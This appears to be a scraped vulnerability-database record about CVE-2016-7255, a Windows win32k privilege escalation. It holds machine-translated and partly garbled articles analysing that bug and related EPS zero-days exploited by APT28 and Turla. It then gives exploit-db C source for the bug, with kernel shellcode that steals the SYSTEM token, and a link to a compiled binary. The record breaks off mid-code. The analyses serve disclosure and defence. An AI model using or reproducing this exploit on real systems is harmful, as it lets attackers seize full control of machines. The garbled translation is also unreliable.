Google and Microsoft have confirmed that a Russian hacker group APT28 used a Flash Vulnerability, CVE-2016-7855 and this kernel mention the right vulnerability to perform a targeted attack, Google also released some for this vulnerability the discussion: \nhttps://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html \nhttps://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/ \nhttp://securityaffairs.co/wordpress/53242/hacking/cve-2016-7255-zero-day.html \nMcAfee Labs vulnerability research team spent a lot of time to analyze this vulnerability. In this article we will briefly discuss some of our findings. \nAnalysis \nWe first from MS16-135 patch to start the analysis, \u5f88\u5feb\u6211\u4eec\u5c31\u6ce8\u610f\u5230MS16-135\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u66f4\u65b0\u4e86win32k.sys so our next step is to start comparing through binary differential means two win32k. sys file to install the patch before and after it. In addition, our test system is running Windows 7, The version number is 6. 1. 7601. 23584\u3002 \nLook at the binary difference of the results, we note that the following function is modified. \n! [](/Article/UploadPic/2016-12/201612312262609. png? www. myhack58. com) \nFigure 1: in win32k. sys is to change the function-xxxNextWindow \nAfter these preliminary investigations we conclude that: CVE-2016-7255 to the patch fully applied to the repair win32k. sys in xxxNextWindow function. \nThe following screenshot shows a patch of xxxNextWindow(x, x)the change of a more advanced overview: \n! [](/Article/UploadPic/2016-12/201612312262532. png? www. myhack58. com) \nFigure 2: The function xxxNextWindow advanced differential results\nWe can see in the repair function to add some new logic, with a red highlight. Zoom in to the first newly inserted basic block, we can see the introduction of a new code to eax + 0x23 compares the value of the operation: \n! [](/Article/UploadPic/2016-12/201612312262346. 
png? www. myhack58. com) \nFigure 3: xxxNextWindow inserted into the first basic block\nThen, our next newly inserted basic block saw a similar logic. \n! [](/Article/UploadPic/2016-12/201612312262724. png? www. myhack58. com) \nFigure 4: xxxNextWindow inserted in the second basic block\nGoogle has stated that the vulnerability\u201ccan be obtained by win32k. sys system call NtSetWindowLongPtr()for GWL_STYLE set to WS_CHILD window handle on the index GWLP_ID trigger.\u201c \nIn fact, NtSetWindowLongPtr()only played trigger this vulnerability to the role, and the fundamental reason is that xxxNextWindow it. More specifically, by NtSetWindowLongPtr()to set inappropriate parameter can trigger xxxNextWindow in the\u201cany address write\u201dscene. \nNow let's look at the unpatched xxxNextWindow(x, x, ...)of the decompiled version. \n! [](/Article/UploadPic/2016-12/201612312262345. png? www. myhack58. com) \nFigure 5: unrepaired xxxNextWindow the decompiled version\nApply the patch after xxxNextWindow(x, x, ...)as shown below: \n! [](/Article/UploadPic/2016-12/201612312262846. png? www. myhack58. com) \nFigure 6: the repaired xxxNextWindow the decompiled version\nPatched after the code using a conditional branch statement\u201c(*(_BYTE *)(v8 + 0x23) & 0xC0) != 0x40\u201denhanced parameter validation. \nIn this new statement, the variable v8 in eax is a GetNextQueueWindow call return value. \uff08See Figure\uff09 \n! [](/Article/UploadPic/2016-12/201612312262410. png? www. myhack58. com) \nFigure 7: variable v8 from the GetNextQueueWindow the call:\u201cv8 = _GetNextQueueWindow(v7, v31, 1);\u201d \nQuick View _GetNextQueueWindow(x, x, ...)is achieved, it reveals the function actually returns a pointer to the tagWND structure pointer. \nThe following figure shows the windbg in tagWND structure: \n! [](/Article/UploadPic/2016-12/201612312262587. png? www. myhack58. 
com) \nFigure 8: tagWND structure\nAnalyzing this code, we can get to know tagWND configuration offset 0x78 of the field is with the vulnerabilities associated. The following from a not repair function to decompile the lines of code confirms this: \n! [](/Article/UploadPic/2016-12/201612312262301. png? www. myhack58. com) \nFigure 9: unrepaired xxxNextWindow problems in the code\nNow the question becomes simple: if we can control in the v8+0x78 the value at the address, it is possible in the core region of an arbitrary address for a write operation, and it is likely you can achieve the mentioned rights. Fortunately, a user state of the API NtSetWindowLongPtr it can be used in this position is set to any value. \nThe following figure shows, we passed to the NtSetWindowLongPtr value, 0x41414141, is the reflection to the tagWND structure, through this vulnerability you can easily achieve arbitrary memory write. \n! [](/Article/UploadPic/2016-12/201612312262505. png? www. myhack58. com)\n\n**[1] [[2]](<82548_2.htm>) [next](<82548_2.htm>)**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-31T00:00:00", "type": "myhack58", "title": "CVE-2016-7255: analysis of Mining the Windows kernel to mention the right vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7855", "CVE-2016-7255"], "modified": "2016-12-31T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82548.htm", "id": "MYHACK58:62201682548", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-17T11:27:29", "edition": 2, "description": "In 2015, FireEye released a Microsoft Office EPS\uff08Encapsulated PostScript in the two vulnerability details. Wherein, a is 0day vulnerabilities, one in the attack a few weeks before playing the patch. Recently, FireEye and Microsoft Office products in the discovery of three new 0day vulnerabilities, these vulnerabilities are being the attacker. \nIn 2017 at the end of 3, We detected another malicious file, which uses the EPS of the unknown vulnerabilities and the Windows Graphics Device Interface GDI in the recently patched vulnerability to deliver malicious software. Subsequently, Microsoft in the 2017 year 4 months to deactivate the EPS, but FireEye in EPS, and found a second unknown vulnerability. \nFireEye believes that there are two organizations Turla and another unknown financial criminal organizations is the use of the first EPS 0day Vulnerability CVE-2017-0261, and APT28, is to use the second EPS 0day Vulnerability CVE-2017-0262 and a new privilege escalation\uff08EOP\uff09 0day Vulnerability CVE-2017-0263 in. Turla and APT28 is Russian cyber espionage organizations, they will these 0day vulnerabilities applied to European Foreign and military Department. And this unidentified financial crime organizations are specifically targeted in the Middle East with offices of regional banks and global banks. 
In the following, we proceed with the introduction of EPS 0day vulnerabilities, related malware and new EOP 0day vulnerabilities. Each EPS 0day vulnerabilities are provided in the corresponding EOP exploit code, in order to provide the right, the code must bypass the sandbox, in order to perform the processing for the EPS FLTLDR. EXE instance. \nWe found that the malicious file is used for the delivery of three different payload. CVE-2017-0261 for delivery SHIRIME\uff08Turla and NETWIRE\uff08unknown financial crime organization, CVE-2017-0262 for delivery GAMEFISH\uff08APT28 it. CVE-2017-0263 for delivery GAMEFISH payload during the elevated privileges. \nFireEye the company's e-mail and network product detects these malicious files. \nIn these Vulnerability Information Disclosure, FireEye has been with the Microsoft Security Response Center MSRC for coordination. Microsoft recommends that all customers follow the security advice ADV170005 in the guidance, do a good job related security and Defense work. \nCVE-2017-0261--EPS\u201crestore\u201dUAF vulnerability \nOpen the Office document, FLTLDR. EXE will be used for rendering included the vulnerability of the embedded EPS image. Here the EPS file is a PostScript program, you can\u201crestore\u201doperation using the UAF vulnerability. \nAccording to the PostScript of the official Description:\u201ca local VM object allocation and the local VM in the existing objects of the modified called by the save and restore function is completed, in the name of the corresponding operation identifier, you can refer to them. save and restore can be used to package in the local VM in the PostScript language program related to the code. restore to be able to release the newly created object, and undo from the corresponding save operation after the existing object to modify.\u201d \nAs described above, the restore operation will be recovered from the save operation after the allocated memory. 
For the UAF vulnerability to say, when the forall operation of the combination, then it could not be better. Figure 1 shows the use of the save and restore operation of the pseudo-code. \n! [](/Article/UploadPic/2017-5/2017517184135487. png? www. myhack58. com) \nFigure 1: exploit the pseudo-code \nThe following operation allows the pseudo-code leaks the metadata, in order to achieve the Read/Write primitives: \n1\\. Create forall_proc array, only a single restore proc elements \n2\\. The EPS state is saved to eps_state \n3\\. In the Save created after the uaf_array \n4\\. Use forall operation to traverse uaf_array elements, for each element call forall_proc \n5\\. The uaf_array the first element is passed to the restore_proc of the call, the process contained in the forall_proc. \n6\\. restore_proc \nTo restore the initial state, the release uaf_array \nalloc_string process will be recycled to release the uaf_array \nforall_proc to call leak_proc \n7\\. forall operation of the follow-up calls for the recovery of uaf_array each element of the call leak_proc, these elements are now stored alloc_string the results of the process \nFigure 2 demonstrates in recovery after using uaf_array the debug log. \n! [](/Article/UploadPic/2017-5/2017517184136535. png? www. myhack58. com) \nFigure 2: uaf_array recycle the debug log \nThrough the operation of save operation after the identifier of the operation, the attacker can manipulate the memory layout, and the UAF vulnerability is converted to a read/write primitive. Figure 3 shows a forgery of the string, the length is set to 0x7fffffff, the cardinality is 0. \n! [](/Article/UploadPic/2017-5/2017517184136165. png? www. myhack58. com) \nFigure 3: Forge of the string object \nThe use of read and write arbitrary user memory capacity, The EPS program may further search the gadgets to build ROP chains, and create a file object. Figure 4 shows the in-memory fake file objects. \n! [](/Article/UploadPic/2017-5/2017517184136436. png? 
www. myhack58. com) \nFigure 4: with the ROP of the pseudo-file object \nBy Faking the file object call to closefile, the exploit code can be transferred to the ROP and start the shellcode with. Figure 5 shows closefile processing program part of the disassembly procedure. \n! [](/Article/UploadPic/2017-5/2017517184136717. png? www. myhack58. com) \nFigure 5: closefile Stack Pivot the disassembly code \nOnce executed, the malware will use the ROP chain to modify the stored shellcode memory region of the protection mechanisms. Thus, the shellcode will be able to perform FLTLDR. EXE running in a sandbox, and at the same time, in order to escape the sandbox detection, it also needs to further mention the right. \nAccording to FireEye found that the use of the vulnerability of the EPS program has two different versions. Wherein st07383. en17. docx using 32 or 64 bit version of CVE-2017-0001 to provide the right, and then perform a contains called SHIRIME malware inject the JavaScript payload. SHIRIME is Turla commonly used specially crafted JavaScript injector one, as the first stage of the payload into the target system, and implements the management and control functions. From the beginning of 2016 since we observed in the wild using the SHIRIME had many times revision, in this 0day vulnerability used in the attack was the latest version, v1. 0. 1004\uff09 \nThe second document Confirmation_letter. docx using 32 or 64 bit version of CVE-2016-7255 to mention the right, and then injected into the NETWIRE malware a new variant. According to our observation, the file is a different version of the file name is very similar. \nThese documents in the EPS program contains different logic to complete the ROP chain and shellcode construct. At the same time, it also uses a simple algorithm for the shellcode part of the obfuscation process, specifically as shown in Figure 6. 
\n\n\n**[1] [[2]](<86206_2.htm>) [[3]](<86206_3.htm>) [next](<86206_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-17T00:00:00", "title": "For the APT organization to use the EPS vulnerabilities in and mention the right vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-17T00:00:00", "id": "MYHACK58:62201786206", "href": "http://www.myhack58.com/Article/html/3/62/2017/86206.htm", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T05:42:07", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EDB-ID:41015", "href": "https://www.exploit-db.com/exploits/41015", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n\r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\r\n*/\r\n\r\n// ricklarabee.blogspot.com\r\n\r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n\r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n\r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n\r\n// Credits: enrique.nissim@IOActive.com: 
https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n\r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n\r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n\r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\r\n\r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n\t//0xcc,\r\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\r\n\t0x9c, 
\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\r\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\r\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\r\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\r\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\r\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\r\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\r\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n\t//<tag>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\r\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\r\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\t//<tag2>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\r\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\r\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\r\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\r\n\r\n\t0x5b, // POP RBX\r\n\t0x59, // POP RCX\r\n\t0x58, // POP RAX\r\n\t0x9d, // POPFQ\r\n\r\n\t0xfb, // STI\r\n\t0xff, 0xe0 // JMP RAX\r\n};\r\n\r\nULONG __cdecl DbgPrint(__in char* Format, 
...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList = NULL;\r\n\tULONG ulRet = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n\r\n\t\tva_start(VaList, Format);\r\n\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n\r\n\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\r\n\t\tva_end(VaList);\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\r\n\treturn ulRet;\r\n}\r\n\r\n\r\nint _sim_key_down(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = 0;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_key_up(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_alt_shift_esc()\r\n{\r\n\tint i = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n\tint i = 0;\r\n\tHWND hWnd = NULL;\r\n\r\n\r\n\tint nFinalRet = -1;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\tfor (i = 0; i < nCount; 
i++)\r\n\t\t{\r\n\t\t\t_sim_key_down(VK_TAB);\r\n\t\t\t_sim_key_up(VK_TAB);\r\n\r\n\t\t\tSleep(1000);\r\n\r\n\t\t}\r\n\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\t} while (FALSE);\r\n\r\n\treturn nFinalRet;\r\n}\r\n\r\nint _sim_alt_esc(int count)\r\n{\r\n\tint i = 0;\r\n\r\n\tfor (i = 0; i<count; i++)\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t//_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t//_sim_key_up(VK_SHIFT);\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = { 0 };\r\n\r\n\tHWND hWndParent = NULL;\r\n\tHWND hWndChild = NULL;\r\n\r\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\r\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid* pId = NULL;\r\n\tMSG stMsg = { 0 };\r\n\r\n\tUINT64 value = 0;\r\n\r\n\tdo\r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\r\n\t\tif (0 == RegisterClassExW(&stWC))\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n#ifdef _WIN64\r\n\t\tpId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n\t\tpId = ((UCHAR*)pAddress - 
0x14);\r\n#endif // #ifdef _WIN64\r\n\r\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n\r\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild, GetDesktopWindow());\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\r\n\t\tSwitchToThisWindow(hWndChild, TRUE);\r\n\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\r\n\t\t\t\r\n\t\t\tSetFocus(hWndParent);\r\n\t\t\t_sim_alt_esc(20);\r\n\t\t\tSetFocus(hWndChild);\r\n\t\t\t_sim_alt_esc(20);\r\n\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t\t\r\n\t\t\tif (value != 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t\r\n\r\n\t\t\t__try {\r\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\r\n\t\t\t\tif ((value & 0x67) == 0x67) {\r\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != hWndParent)\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif (NULL != hWndChild)\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n\r\n\treturn 0;\r\n}\r\n\r\nUINT64 get_pxe_address(UINT64 address) {\r\n\tUINT entry = PML4_SELF_REF_INDEX;\r\n\tUINT64 result = address >> 9;\r\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n\tresult = result | lower_boundary;\r\n\tresult = result & upper_boundary;\r\n\treturn result;\r\n}\r\n\r\nUINT64 look_free_entry_pml4(void) {\r\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n\tint offset = 0xF00;\r\n\tUINT64 pml4_search = PML4_BASE + offset;\r\n\twhile (offset < 
